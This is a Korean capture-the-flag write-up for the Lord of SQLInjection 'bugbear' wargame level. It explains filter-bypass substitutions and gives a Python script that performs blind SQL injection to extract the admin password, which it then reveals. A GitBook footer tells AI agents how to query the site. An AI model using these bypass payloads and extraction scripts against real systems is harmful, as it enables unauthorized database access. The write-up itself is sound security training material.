> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-bugbear.md).

# \[Lord Of SQLInjection] bugbear

<figure><img src="https://blog.kakaocdn.net/dna/9OOU0/btsMCbHn9zq/AAAAAAAAAAAAAAAAAAAAAKoCuDiuKWNXeBIv3h2zP4zdkK5jpOkkW9Qpzn1eSODT/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=4tZCR7nVB93I02nLZjO%2FxZ5Su3g%3D" alt="" height="358" width="740"><figcaption></figcaption></figure>

```
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
```

→ admin에 사이트에서 요구하는 pw 값과 일치하는 값을 정확하게 입력해야함을 명시하고 있음

→ ‘는 “, substr()은 mid(), =과 like는 in, space(공백)은 /\*\*/으로 대체하여 해결

<figure><img src="https://blog.kakaocdn.net/dna/bdFJYy/btsMDt1iPqv/AAAAAAAAAAAAAAAAAAAAAJruZ16gUn6gGH2sSbu1gDKm1q2Bz5slc7PjMg5hpeZg/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=FILv%2F1h%2BBsvu%2Be8nNWfRosKKYis%3D" alt="" height="474" width="725"><figcaption></figcaption></figure>

→ Hello admin이라고 뜨는 걸로 보아, pw의 길이가 8이라는 것을 알 수 있다.

이전에 제가 풀었던, vampire처럼 1:1로 대응하는 방법도 있겠지만 너무 노가다이므로,,, 파이썬 코드로 자동화 시켜서 알아보겠습니다

```
import requests

password = ''

for admin_len in range(8): #pw의 길이 8만큼 수행
    for admin_pass in range(ord('0'), ord('z')): #숫자 0에서 부터 문자 z까지 대입
        URL = '<https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php>'
        query = {'no':'0||id/**/in/**/(\\"admin\\")/**/&&/**/mid(pw,1,'+str(admin_len+1)+')/**/in/**/(\\"'+password+chr(admin_pass)+'\\")#'}
        cookies = {'PHPSESSID' : '쿠키 정보'} #쿠키 정보에 각자의 쿠키 값을 대입
        res = requests.get(URL, params = query, cookies = cookies)
        if('Hello admin' in res.text): #만약에 res.text에 Hello admin이 뜨면 pw 출력
            password = password + chr(admin_pass)
            print('Password detected (' + str(admin_len + 1) + ' words): ' + password)
            break
```

→ pw=52dc3991 이 패스워드인 것을 알 수 있다.

→ 이를 문제에 대입하면 클리어 창이 뜨는 것을 알 수 있다.

<figure><img src="https://blog.kakaocdn.net/dna/AuG6I/btsMAZnKRB1/AAAAAAAAAAAAAAAAAAAAACpFlhQ2pM6YTzNPnDKWfhmlrLesrVIS-qEdVS653LEa/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=qnaiz1yzCOekdzDVtE1OigLcGd4%3D" alt="" height="499" width="751"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-bugbear.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.